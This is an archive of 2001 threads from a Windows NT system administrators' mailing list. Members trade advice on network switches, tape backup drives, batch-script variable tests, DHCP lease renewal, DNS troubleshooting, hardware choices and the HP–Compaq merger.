Title: Message I agree that getting switches is the way to go. I've got a HP which is kind of nice because of the expansion capability. You just add 8-port modules as needed. -Original Message-From: Don Ely [mailto:[EMAIL PROTECTED]]Sent: Monday, September 10, 2001 12:13 PMTo: NT System Admin IssuesSubject: RE: Hub Recommendations Cisco Catalyst Series Switches are some of the best and most reliable. Managed switches are better if you're looking to trap SNMP traffic. D -Original Message-From: Roger Wright [mailto:[EMAIL PROTECTED]] Sent: Monday, September 10, 2001 12:09 PMTo: NT System Admin IssuesSubject: Hub Recommendations I need to replace one of my hubs (the smoke leaked out of the box) and would appreciate some recommendations. I'd like to get three 24 port auto-sensing 10/100 units.This will give me 8-10 spare ports for expansion in our 65-node network. What is the difference between a hub and a managed hub? Should I consider installing switches rather than plain hubs? Brand recommendations? We've been using Intel units but I have no loyalty to any particular product line at this time. Roger Wright Southern Commerce Bank ___ Among economists, the real world is often a special case. --Horngren http://www.sunbelt-software.com/ntsysadmin_list_charter.htm ___ NOTICE: The information contained in this electronic message is considered privileged and confidential under Florida Statutes 455.251 and 3905.017. It is intended solely for the use of the recipient named above. If the reader is not the recipient named above, you are hereby notified that any dissemination, distribution, copying or disclosure of the contents of this message is prohibited. If you have received this e-mail message in error, please immediately notify the sender and destroy the original message. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Hub Recommendations
Title: Message Just turn it on. IP address would be used for management. -Original Message-From: Roger Wright [mailto:[EMAIL PROTECTED]]Sent: Monday, September 10, 2001 1:26 PMTo: NT System Admin IssuesSubject: RE: Hub Recommendations Is a switch a "connect and go" device or would I need to do some configuration? Does it require an IP address? Roger Wright Southern Commerce Bank ___ IRS: Income Removal Service -Original Message-From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]Sent: Monday, September 10, 2001 3:17 PMTo: NT System Admin IssuesSubject: RE: Hub Recommendations I agree that getting switches is the way to go. I've got a HP which is kind of nice because of the expansion capability. You just add 8-port modules as needed. -Original Message-From: Don Ely [mailto:[EMAIL PROTECTED]]Sent: Monday, September 10, 2001 12:13 PMTo: NT System Admin IssuesSubject: RE: Hub Recommendations Cisco Catalyst Series Switches are some of the best and most reliable. Managed switches are better if you're looking to trap SNMP traffic. D -Original Message-From: Roger Wright [mailto:[EMAIL PROTECTED]] Sent: Monday, September 10, 2001 12:09 PMTo: NT System Admin IssuesSubject: Hub Recommendations I need to replace one of my hubs (the smoke leaked out of the box) and would appreciate some recommendations. I'd like to get three 24 port auto-sensing 10/100 units.This will give me 8-10 spare ports for expansion in our 65-node network. What is the difference between a hub and a managed hub? Should I consider installing switches rather than plain hubs? Brand recommendations? We've been using Intel units but I have no loyalty to any particular product line at this time. Roger Wright Southern Commerce Bank ___ Among economists, the real world is often a special case. --Horngren http://www.sunbelt-software.com/ntsysadmin_list_charter.htm ___ NOTICE: The information contained in this electronic message is considered privileged and confidential under Florida Statutes 455.251 and 3905.017. It is intended solely for the use of the recipient named above. If the reader is not the recipient named above, you are hereby notified that any dissemination, distribution, copying or disclosure of the contents of this message is prohibited. If you have received this e-mail message in error, please immediately notify the sender and destroy the original message. http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm ___ NOTICE: The information contained in this electronic message is considered privileged and confidential under Florida Statutes 455.251 and 3905.017. It is intended solely for the use of the recipient named above. If the reader is not the recipient named above, you are hereby notified that any dissemination, distribution, copying or disclosure of the contents of this message is prohibited. If you have received this e-mail message in error, please immediately notify the sender and destroy the original message. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Backup Device Advice?
Title: RE: Backup Device Advice? I'm still using a Travan, which comes in a 20gig version. I've also got a VXA unit that I haven't put into production. It was about $800 at the time. -Original Message- From: Owsley, Kenneth [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 06, 2001 3:13 PM To: NT System Admin Issues Subject: RE: Backup Device Advice? DLT. Thats the only way to go. You can get an Quantum DLT 8000 for around $3,500 or so. Thats rated at 80GB with compression, but I typically get 75 or so GB on a tape. They are alos fast. Much faster than the helical scan technologies. -Original Message- From: Murray Binette [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 06, 2001 3:14 PM To: NT System Admin Issues Subject: Backup Device Advice? Our 4GB Travan tape drive is starting to get a bit for our Small Business Server (NT 4.0 sp6). We're looking at something in the 20+GB range. If anyone has any advice regarding. different types of tape drive technology (DDS vs. QIC vs. DAT) I'm not to sure what the advantages of one format over the other are. Thanks! Murray Binette Systems Administrator Cybertech Automation Inc. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Test Whether Variable Exists
Title: FW: Test Whether Variable Exists He's probably having a problem with his e-mail. Unsubbing him isn't the answer. I think there was a bug in OL caused by IE if I'm not mistaken, for example. -Original Message-From: EALES, Jack / RSAIFS - IOM [mailto:[EMAIL PROTECTED]]Sent: Friday, September 07, 2001 6:35 AMTo: NT System Admin IssuesSubject: RE: Test Whether Variable Exists Stu - can you get this guy unsubbed before he drives us all mad? A blank response to every posting is getting a little annoying ;-) Cheers Jack -Original Message-From: Pete Karhatsu [mailto:[EMAIL PROTECTED]]Sent: 07 September 2001 14:17To: NT System Admin IssuesSubject: FW: Test Whether Variable ExistsTHIS MESSAGE ORIGINATED ON THE INTERNET - Please read the detailed disclaimer below.-- -Original Message- From: Colin Leeson [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 06, 2001 9:48 PM To: NT System Admin Issues Subject: RE: Test Whether Variable Exists Try this Date /t test.txt ...and notice the space after the date Col -Original Message- From: Andrew S. Baker [mailto:[EMAIL PROTECTED]] Sent: Friday, 7 September 2001 11:44 To: NT System Admin Issues Subject: RE: Test Whether Variable Exists Type either of the following at the command line: SET TEST= HELLO or SET TEST=HELLO (with a trailing space) Now type: ECHO "%TEST%" == ASB - http://www.ultratech-llc.com/KB/?File=~MoreInfo.TXT == "Little progress can be made by merely attempting to repress what is evil. Our great hope lies in developing what is good." -- President Calvin Coolidge (1872-1933). ~~~ Keystrokes are an Endangered Species: http://www.shortkeys.com/ ~~~ -Original Message- From: Correa, Andre [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 06, 2001 8:17 PM To: NT System Admin Issues Subject: RE: Test Whether Variable Exists How do you set an environment variable with a space?? I have never seen that Andre Correa Senior Manager/Information Technology Lexitron, Inc (201) 892-6399 -Original Message- From: Andrew Baker [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 06, 2001 7:14 PM To: NT System Admin Issues Subject: RE: Test Whether Variable Exists Using double quotes is best because the command won't break if the environment variable contains a space - ASB-Original Message- From: Correa, Andre [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 06, 2001 1:02 PM To: NT System Admin Issues Subject: RE: Test Whether Variable Exists I believe that IF DEFINED only works on NT boxes, not 95/98. If it is an all NT environment, then it is OK. Otherwise, use syntax as follows: If not {%somevar%}=={} echo Variable exists The { sign can be replaced with quotes, but to each their own. The double = is very important, otherwise you will tear out every last strand of hair on your head HTH Andre Correa Senior Manager/Information Technology Lexitron, Inc (201) 892-6399 -Original Message- From: Torres, Edgar (GEP) [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 06, 2001 12:26 PM To: NT System Admin Issues Subject: RE: Test Whether Variable Exists if defined MYVAR echo It exists! __ Edgar Torres -Original Message- From: Simon Butler [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 06, 2001 12:22 PM To: NT System Admin Issues Subject: Test Whether Variable Exists Hi, This should be an easy one but I cannot find the answer after hours of searching. I am looking for a way that I can test whether a variable exists and then take action on the result. This is for use in a login script - not a KIX script. I don't want to add, change or delete the variable in anyway, just check whether it is there or not. Can anyone suggest a way? Thanks, Simon Butler. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm--The following message has been automatically added by the mail gateway to comply with a Royal Sun Alliance IT Security requirement:As this email
RE: Compaq Evo Workstation W6000
Title: RE: Compaq Evo Workstation W6000 I've got an old HP Netserver, an IBM Netfinity 3000 and a whitebox from U-tron. They all work fine. The whitebox was significantly cheaper (like maybe 1/2 the price at the time for a compatible Dell, HP or Compag). -Original Message- From: Sean Martin [mailto:[EMAIL PROTECTED]] Sent: Friday, September 07, 2001 11:32 AM To: NT System Admin Issues Subject: RE: Compaq Evo Workstation W6000 He doesn't need a laptop. Current setup. Toshiba laptop for all applications and clone box NT server for file/print services. The NT server is useless and the laptop is falling apart. He wants to consolidate everything onto one computer. He wants disk mirroring capability (which I'm not even sure the Ultra160 controller can even do - still reading). He wanted something that was dual processor capable (even though I know he'll never use it or need it) and he wants something that will last awhile. Something 'cheap' wasn't one of his concerns. He runs a myriad of applications ranging from Office, Quicken, Vendor specific software and diagnostic software for ATM's and Kiosks (sp?), and countless others. He's an agent for NCR so he sells ATM's, Kiosk's, Cold Imaging solutions. I know the Evo would be more machine than he needs. I guess the better thing to do is ask for recommendations based on his needs/wants. Dual processor capable Disk mirroring - hardware (obviously) He basically wants a super computer that will fit under his desk. What would you all recommend based on your experiences with different brands? Regards, Sean Martin, MCSE Network Administrator Ribelin Lowell Company Insurance Brokers, Inc. 3111 C Street, Suite 300 Anchorage, Alaska 99503 Ph: (907) 561-1250 Fax: (907) 561-4315 Cell: (907) 229-0885 Email: [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] -Original Message- From: Kevin Miller [mailto:[EMAIL PROTECTED]] Sent: Friday, September 07, 2001 9:56 AM To: NT System Admin Issues Subject: RE: Compaq Evo Workstation W6000 From a laptop to a server/? Sounds like more info on his business size and what he does would help? Buy him a nice dell laptop with a fire wire CDrw. sounds like my suggestion. Or if he does not need a laptop, get him a cheap HP machine. -Original Message- From: Sean Martin [mailto:[EMAIL PROTECTED]] Sent: Friday, September 07, 2001 1:40 PM To: NT System Admin Issues Subject: Compaq Evo Workstation W6000 Hey folks, My old man runs his own business out of his home and he's looking to get some new hardware. He currently runs all of his applications off of a 4 year old Toshiba laptop. He wants something that'll be robust, fast, provide some level of fault tolerance, and be reliable. Most of my experience is with Compaq so I'm starting with them. The machine I'm looking at is a Compaq Evo Workstation W6000. Specs: Intel Xeon 1.7Ghz (dual proc. capable), 512mb RDRAM/800, Integrated Ultra160 SCSI Drive - (1) 18.2gb/15k Ultra 160 SCSI drive and (1) 18.2 WideUltra3 SCSI 15k, cd, nic, blah, blah, running Win2k Pro. First, does anyone have any experience with this particular model? Likes - Dislikes? Second, there's no option for an internal tape drive, so what external models would you recommend? (to be safe, I'd go with tape storage equal to the amount of disk space) Thanks in advance for your suggestions, insight, warnings, etc... Regards, Sean Martin, MCSE Network Administrator Ribelin Lowell Company Insurance Brokers, Inc. 3111 C Street, Suite 300 Anchorage, Alaska 99503 Ph: (907) 561-1250 Fax: (907) 561-4315 Cell: (907) 229-0885 Email: [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] DO NOT read, copy or disseminate this communication unless you are the intended addressee. This e-mail communication contains confidential and/or privileged information intended only for the addressee. If you have received this communication in error, please call us immediately at (907) 561-1250 and ask to speak to the sender of the communication. Also, please e-mail the sender and notify the sender immediately that you have received the communication in error. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm DO NOT read, copy or disseminate this communication unless you are the intended addressee. This e-mail communication contains confidential and/or privileged information intended only for the addressee. If you have received this communication in error, please call us immediately at (907) 561-1250 and ask to speak to the sender of the communication. Also, please e-mail the sender and notify the sender immediately that you have received the communication in error. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: email to replace fax?
Title: RE: email to replace fax? Are you trying to e-mail or fax? If e-mail, and your database of recipients is ODBC-compliant, then try the Gammadyne Mailer - www.gammadyne.com. You can create projects based on queries. -Original Message- From: thomas smith [mailto:[EMAIL PROTECTED]] Sent: Friday, September 07, 2001 2:12 PM To: NT System Admin Issues Subject: email to replace fax? I currently do my own price requests for equipment. (Purchasing does everything EXCEPT computer gear.) I use WinFax Pro. I have a database of recipients, organized into groups, based on hardware/software/whatever for which I require pricing. Using WinFax Pro requires that I use my modem. This is currently NOT a problem. But I HAVE been thinking... Perhaps I could accomplish the same thing via email. I personally don't use Outlook...yet. I'm still using Eudora. But from what I've seen, it doesn't APPEAR that either is particularly conducive to creating groups to accomplish the same thing. So I've been wondering... Assuming I'm correct about neither being particularly suited to doing what I'm wanting to do, does anyone know of some kind of email app that would allow this? (I know that WinFax Pro can interface to email. And I tried it...once. It sucks...assuming I was using it as designed...which I think I was.) Other than my Eudora client, Outlook or Exchange Server, I am ignorant of email package(s) for ANYTHING. Thanks in advance, you help is appreciated. :) - Thomas Smith IT Supervisor, AKA: Systems Administrator, Network Administrator, Database Administrator, Security Administrator, Email Administrator, Telecommunications Administrator, Webmaster Henry Co Water and Sewerage Authority 770.957.6659 (v) / 770.898.8416 (f) [EMAIL PROTECTED] http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Restore Question
What's wrong with their support? As much as I hate to admit it, they've always come thru for me.Of course I hesitate to ante up $250 for support calls, but it's been more cost effective than some of the support I'm paying for 3rd party products. -Original Message-From: Daniel Burns [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 06, 2001 10:49 AMTo: NT System Admin IssuesSubject: Re: Restore Question LOL...Microsoft has support?? You mean other than Technet and User Groups?? Get out of here! Dan - Original Message - From: Correa, Andre To: NT System Admin Issues Sent: Thursday, September 06, 2001 12:18 PM Subject: RE: Restore Question Cheapest way and maybe second fastest would be to install 2000 and then use Dcpromo to demote from Domain Controller to member server. Absolute fastest way might be to use U-Promote (third party utility), but Microsoft says they will discontinue support on a NT server that has been Upromoted (Oh no, what will I do without Microsoft Support??? takes tongue out of cheek) Andre Correa Senior Manager/Information Technology Lexitron, Inc (201) 892-6399 -Original Message-From: Daniel Burns [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 06, 2001 12:58 PMTo: NT System Admin IssuesSubject: Restore Question Has anyone ever tried to restore a machine back to it original state, except, BIG exception, without making it a BDC? I am want to upgrade and old imaging system, that doesn't have support...long story, but I don't want this machine to be a DC anymore. I want to move to a Windows 2000 Network and I know I can do a mixed mode, but if I could do this, my job would be much easier. Weird question I knowbut has anyone ever tried this?? Thanks, Dan http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: IP Justification
Title: RE: IP Justification Sprint just gave me what I needed. In hindsight, I wish I could've just used NAT to simplify the process for the next time. -Original Message- From: David James [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 06, 2001 11:48 AM To: NT System Admin Issues Subject: IP Justification I'm using around 8 IP's right now, but my ISP is going bye bye at the end of this month. I'd like to have a block of IP's from the new ISP, just in case I need more etc. etc. What kind of ammunition do you guys use to justify your need for IP's? We currently have 128, but that's way too many. I can take care of everything I need with less than 32 for now, but you never know as far as the future. Any thoughts or strategies, experiences with this document? DJ http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Unable to resolve DNS
Title: RE: Unable to resolve DNS Guys/Gals - he's not getting these - he asked for a direct post to his account. -Original Message- From: Jeff Wilcox [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 05, 2001 7:47 AM To: NT System Admin Issues Subject: RE: Unable to resolve DNS There are a couple things to check: When you do a nslookup, does your your dns server try to resolve the address? Do you have a reverse lookup zone created? Is your DNS server set to forward an requests to your ISP dns server? -Original Message- From: Neil Macdonald [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 05, 2001 10:48 AM To: NT System Admin Issues Subject: Unable to resolve DNS Hello, all. My NT server has suddenly stopped resolving DNS names. It's NT 4, sp 6a, connected to a router and an ADSL line to our providers site, where there are two DNS servers. I can ping out using IP addresses, but if I ping a www site I get bad IP address. I have reinstalled TCP/IP and service packed to no avail. I also removed RAS and an old external modem which wasn't being used (Tapisrv.exe was using some resources, and technet implied this may be a cause). All other PC's on the network can browse internet, without problem, so it's definitely the server. It was working on minute, then the next... nothing. I have updated antivirus and scanned, nothing there. Please help ! Incidentally, I am not receiving the mails from the list, so please reply to [EMAIL PROTECTED] with ideas and I will be most grateful. Thank you one and all, Neil Macdonald http://www.sunbelt-software.com/ntsysadmin_list_charter.htm ** This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the e-mail originator. This footnote also confirms that this email message has been swept by MIMEsweeper for the presence of computer viruses. However, please check this e-mail for virus infection for which CDG Management LLC accepts no responsibility ** http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Force DHCP clients to update
Title: Message http://support.microsoft.com/support/kb/articles/Q197/4/24.ASPfor a VB example - looks like it clears the ip address. http://support.microsoft.com/support/kb/articles/Q217/0/35.ASPfor a reghack to set win98 to automatically release dhcp info on shutdown. Either could be helpful. Guess it depends on the number of workstations if it's worth it. -Original Message-From: Brian Judge [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 04, 2001 9:27 AMTo: NT System Admin IssuesSubject: RE: Force DHCP clients to update According to m$, this can't be done. When a scope changes, clients will only automatically renew the lease after half the lease time has expired. Winipcfg has to be used for win95 clients (I think ipconfig /renew_all) will work for win98. -Original Message-From: Anthony [mailto:[EMAIL PROTECTED]] Sent: 04 September 2001 16:56To: NT System Admin IssuesSubject: Re: Force DHCP clients to update Hmmm, Anyhow, as with NT4 dhcp scopes, can you not just set the lease to 1 day or something? Then after a week, set it back to whatever you had set it to before? - Original Message - From: Martin Blackstone To: NT System Admin Issues Sent: Tuesday, September 04, 2001 3:51 PM Subject: RE: Force DHCP clients to update When I did this, I sent all my users an email with a simple .cmd file. @Echo Off IPConfig /Release IPConfig /renew exit -Original Message-From: Brian Judge [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 7:30 AMTo: NT System Admin IssuesSubject: Force DHCP clients to update Hi all. I've just changed a setting on my DHCP server (Win2k). I added in a gateway. Does anyone know of a way to force all all clients to renew their lease, thus obtaining the updated information. I have a mixture of Win9x and Win2k clients. I was thinking of adding in an "ipconfig /release, ipconfig /renew etc." line into a login script but some win9x clients won't accept this. Any thoughts greatly appreciated. Brian Judge The information in this e-mail (which includes any files transmitted with it) is confidential and may also be legally privileged. It is intended for the addressee only. Access to this email by anyone else is unauthorised. It is not to be relied upon by any other person other than the addressee except with our prior approval. If no such approval is given, we will not accept liability (in negligence or otherwise) rising from any third party acting, or refraining from acting, on such information. Unauthorised recipients are required to maintain confidentiality. If you have received this e-mail in error please notify us immediately, destroy any copies and delete it from your computer system. Any use, dissemination, forwarding, printing or copying of the email is prohibited. Copyright in this e-mail and any document created by us will be and remain vested in us and will not be transferred to you. We assert the right to be identified as the author of and to object to any misuses of the contents of this email or such documents. Grant Thornton is authorised by the Institute of Chartered Accountants in Ireland to carry on investment business. A list of partners may be inspected at Grant Thornton, Ashford House, Tara Street, Dublin 2, Irelandhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm The information in this e-mail (which includes any files transmitted with it) is confidential and may also be legally privileged. It is intended for the addressee only. Access to this email by anyone else is unauthorised. It is not to be relied upon by any other person other than the addressee except with our prior approval. If no such approval is given, we will not accept liability (in negligence or otherwise) rising from any third party acting, or refraining from acting, on such information. Unauthorised recipients are required to maintain confidentiality. If you have received this e-mail in error please notify us immediately, destroy any copies and delete it from your computer system. Any use, dissemination, forwarding, printing or copying of the email is prohibited. Copyright in this e-mail and any document created by us will be and remain vested in us and will not be transferred to you. We assert the right to be identified as the author
RE: HP to Acquire Compaq in $25B Deal
Title: Message Yup. Doesn't matter if it's merger, purchase or hostile takeover - heads will roll. Been there, done that. The only people that make out like bandits are the stationary people (letterhead, business cards,etc.) Hopefullythe layoffs won't negatively affect service(it will of course, 'cause the bright sparks will see 30 HP techs and 30 Compaq techs and reason somehow that 35 techs can handle the combined load), and the 15k lives + family members negatively affected willfind gainful employment. -Original Message-From: xylog [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 04, 2001 10:44 AMTo: NT System Admin IssuesSubject: RE: HP to Acquire Compaq in $25B Deal I have been through several mergers of large/Fortune 100 corperations (Union Bank of Switzerland and Swiss Bank/Paine Webber and Kitter Peabody) and can speak from experience when I say that ther will be large cuts in the workforce of both companies to eliminate redundant functions. It is just common sense to cut costs by combining, wherever possible, duplicated functions. Where these cuts will occur is a matter of speculation, but you can be sure since HP has controlling interests they will generally get preferential treatment. xylog -Original Message-From: David James [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 1:25 PMTo: NT System Admin IssuesSubject: RE: HP to Acquire Compaq in $25B Deal It's not a merger? You'd better learn big business. It's a merger, and don't expect to see too many changes too quickly. Compaq was already making big time changes in it's product line before this even happened. HP was planning on getting out of the PC business anyways. A name change could happen, but who knows? I don't appreciate the naive comment anyhoo... You saying it's not a merger is naive... -Original Message-From: xylog [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 12:03 PMTo: NT System Admin IssuesSubject: RE: HP to Acquire Compaq in $25B Deal Except its not a merger. HP purchsed compaq. HP's management now controls the Compaq's destiny. What this means is that HP will, in order to cut costs, eliminate all possible redundant functions.I agree it is a good merger, but it is very naïve to expect nothing to change. xylog -Original Message-From: David James [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 12:48 PMTo: NT System Admin IssuesSubject: RE: HP to Acquire Compaq in $25B Deal I don't think there will be duplicate positions. I expect them to continue to function as 2 seperate companies. Compaq's name is much bigger than HP, especially in the server market. I think HP just wanted a bigger piece of the PC and Server pie, and Compaq wanted the financial backing of HP's dominance in the peripheral and printer market. It's a good merger. -Original Message-From: Jim Underwood [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 11:32 AMTo: NT System Admin IssuesSubject: RE: HP to Acquire Compaq in $25B Deal Interesting articles at www.infoworld.com: 1. HP, Compaq target enterprise, services markets in $25 billion acquisition 2. Merger highlights role of HP's Fiorina While the merger may not guarantee an improvement in sales/performance, does anyone see a downside to the merger (other than HP/Compaq employees who will lose their job when duplicate positions are eliminated)? Do you expect the merger to provide better products and services? Best Regards, JMU http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: HP to Acquire Compaq in $25B Deal
Title: Message h, oooh, I know. He finds them on the internet, which he invented along with pants. -Original Message-From: Bill Higgins [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 04, 2001 11:38 AMTo: NT System Admin IssuesSubject: RE: HP to Acquire Compaq in $25B Deal William (1) Where do you find these things? (1) Hi William -Original Message-From: Lefkovics, William [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 04, 2001 11:32To: NT System Admin IssuesSubject: RE: HP to Acquire Compaq in $25B Deal I hear the new HP Proliants will ship with WindowsRG: http://www.newgrounds.com/portal/uploads/27000/27549_winrg2.swf William -Original Message-From: C.E. GENE CONNOR [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 04, 2001 11:41 AMTo: NT System Admin IssuesSubject: RE: HP to Acquire Compaq in $25B Deal The combined entity, which will take the Hewlett-Packard name http://www.zdnet.com/zdnn/stories/news/0,4586,5096522,00.html?chkpt=zdnnt090401ts Gene C. aka C.E. Gene ConnorGene's Custom PC Service since 1989Serving the U.S., Canada London,England -Original Message-From: Andrew Baker [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 04, 2001 1:45 PMTo: NT System Admin IssuesSubject: RE: HP to Acquire Compaq in $25B Deal Agreed. - ASB -Original Message-From: xylog [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 04, 2001 1:44 PMTo: NT System Admin IssuesSubject: RE: HP to Acquire Compaq in $25B Deal I have been through several mergers of large/Fortune 100 corperations (Union Bank of Switzerland and Swiss Bank/Paine Webber and Kitter Peabody) and can speak from experience when I say that ther will be large cuts in the workforce of both companies to eliminate redundant functions. It is just common sense to cut costs by combining, wherever possible, duplicated functions. Where these cuts will occur is a matter of speculation, but you can be sure since HP has controlling interests they will generally get preferential treatment. xylog http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: nt40 desktop not appearing
Title: RE: nt40 desktop not appearing Is explorer running in taskmanager? if not, try adding it. -Original Message- From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Friday, August 31, 2001 9:19 AM To: NT System Admin Issues Subject: nt40 desktop not appearing After I rebooted my NT4.0 SP4 development server today it returned only the the CTRl-ALT-DEL dialog box. The NT splash banner was not in the background. I logged in but only received a blank blue screen, no icons or desktop. No task bar etc. I can even hit CTRL-ALT-DEL and get the task manager dialog and that all works, but I cannot get access to the desktop. Anyone have any idea what the heck is going on? There is no virus, not connected to Internet or no programs have been installed. Thanks, John Cesta http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Internet Explorer 6.0
Title: Message Got this from Lockergnome Tech Specialist: IE6 and McAfee No less than four readers wrote in to complain about Internet Explorer 6 and McAfee virus scanning software. While I don't consider this a Microsoft problem, some might. Norton AV seems to work just fine on one of my systems, but I can't personally speak for McAfee. Tread lightly around the issue, as their support has told two of those that wrote in very bluntly that they should simply reinstall IE 5.5x. That's a complete cop-out in my book. There was plenty of lead-time on IE6 for McAfee to get their act together, so I don't think there's any excuse for not having an update available. Just wanted to warn you. From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 30, 2001 15:49 To: NT System Admin Issues Subject: RE: Internet Explorer 6.0 Hmmm...No We have done a test rollout here to about 6 WKs. Nobody has reported any issues yet. -Original Message- From: Murray Freeman [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 30, 2001 1:39 PM To: NT System Admin Issues Subject: Internet Explorer 6.0 Well, a couple of us have installed IE 6.0 and we seem to be having frame problems. Pages display ads, but not the text just like when we print them sometimes. And on some, we get the text, but no sidebars. Any ideas? Murray http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Internet Explorer 6.0
Title: Message I dunno. You've got the whole snip from his newsletter. -Original Message-From: Allen Crawford [mailto:[EMAIL PROTECTED]]Sent: Friday, August 31, 2001 9:26 AMTo: NT System Admin IssuesSubject: RE: Internet Explorer 6.0 What exactly is the problem with McAfee and IE6? -Original Message-From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]Sent: Friday, August 31, 2001 11:19 AMTo: NT System Admin IssuesSubject: RE: Internet Explorer 6.0 Got this from Lockergnome Tech Specialist: IE6 and McAfee No less than four readers wrote in to complain about Internet Explorer 6 and McAfee virus scanning software. While I don't consider this a Microsoft problem, some might. Norton AV seems to work just fine on one of my systems, but I can't personally speak for McAfee. Tread lightly around the issue, as their support has told two of those that wrote in very bluntly that they should simply reinstall IE 5.5x. That's a complete cop-out in my book. There was plenty of lead-time on IE6 for McAfee to get their act together, so I don't think there's any excuse for not having an update available. Just wanted to warn you. From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 30, 2001 15:49 To: NT System Admin Issues Subject: RE: Internet Explorer 6.0 Hmmm...No We have done a test rollout here to about 6 WKs. Nobody has reported any issues yet. -Original Message- From: Murray Freeman [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 30, 2001 1:39 PM To: NT System Admin Issues Subject: Internet Explorer 6.0 Well, a couple of us have installed IE 6.0 and we seem to be having frame problems. Pages display ads, but not the text just like when we print them sometimes. And on some, we get the text, but no sidebars. Any ideas? Murray http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: windows 2000 login script entry
